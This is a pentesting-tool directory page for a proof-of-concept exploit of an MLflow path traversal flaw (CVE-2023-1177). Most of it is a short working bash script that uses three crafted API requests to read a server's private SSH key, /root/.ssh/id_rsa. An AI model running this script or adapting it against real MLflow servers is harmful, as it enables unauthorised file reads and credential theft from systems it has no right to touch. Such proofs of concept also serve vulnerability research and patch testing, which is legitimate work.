Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-1177 — Proof-of-concept exploit for MLflow path traversal (CVE-2023-1177) allowing unauthorized file read via crafted API requests. | Kitploit
Tools/GitHubGitHub/charlesgargasson/cve-2023-1177
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcharlesgargasson/cve-2023-1177

CVE-2023-1177

Proof-of-concept exploit for MLflow path traversal (CVE-2023-1177) allowing unauthorized file read via crafted API requests.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

############# CVE-2023-1177 #############

| | MLFlow Path Traversal | Tested on MLflow 2.2.0 | src: https://github.com/iumiro/CVE-2023-1177-MLFlow |

.. code-block:: bash

#!/bin/bash RAND="EXPLOIT-$((1+$RANDOM%9999))" URL="http://172.17.0.2:6001" FILE='/root/.ssh/id_rsa' curl -vX POST "$URL/ajax-api/2.0/mlflow/registered-models/create" -d "{"name":"$RAND"}" -H "Content-Type: application/json" curl -vX POST "$URL/ajax-api/2.0/mlflow/model-versions/create" -d "{"name":"$RAND","source":"file://%00${FILE%/}/"}" -H "Content-Type: application/json" curl -v "$URL/model-versions/get-artifact?path=${FILE##/}&name=$RAND&version=1"

|

Download Tool